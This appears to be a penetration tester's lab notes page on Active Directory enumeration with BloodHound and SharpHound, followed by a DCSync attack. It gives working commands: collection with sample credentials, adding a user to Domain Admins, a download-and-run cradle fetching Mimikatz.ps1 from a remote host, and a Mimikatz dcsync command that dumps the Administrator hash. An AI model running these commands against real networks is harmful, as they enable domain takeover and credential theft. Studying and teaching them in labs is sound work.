Bloodhound

Overview

Bloodhound works the same way that ldapdomaindump but it also collects data using Kerberos tickets and SMB sessions.

Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths.

Domain Enumeration

sudo neo4j console
sudo bloodhound
sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all

Upload the dumped files into the Bloodhound GUI

Custom user to machine session query

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Sharphound

If you don't have valid AD credentials and only an open shell you can run sharphound.exe to collect the data

This is very noisy so it should only be ran if you don't mind the noise

SharpHound.exe -c All

Methodology

  • Mark all pwned machines

  • Check Reachable High Value Targets

    • Essentially checks if that one machine could compromise the entire domain

  • Check Inbound Control Rights

    • What can account/gorups can control this object

  • Check Outbound Control Rights (First Degree Object Control)

    • What objects can our compromised machine control

DCSync/GetChangesAll

If you have GetChanges and GetChangesAll privileges you can perform a dcsync attack. This attack abuses dcsync and the way it works with syncing domain controllers together to make sure that they both have the most up to date data. This means that we can extract all of the NTLM hashes by requesting a dcsync with the domain controller.

Add yourself to the Domain service accounts

 net group "Domain Admins" itmanager /add /domain

Amsi bypass then use mimikatz

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')

Grab domain admin hash

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'
PreviousLdapdomaindumpNextAttack Paths

Last updated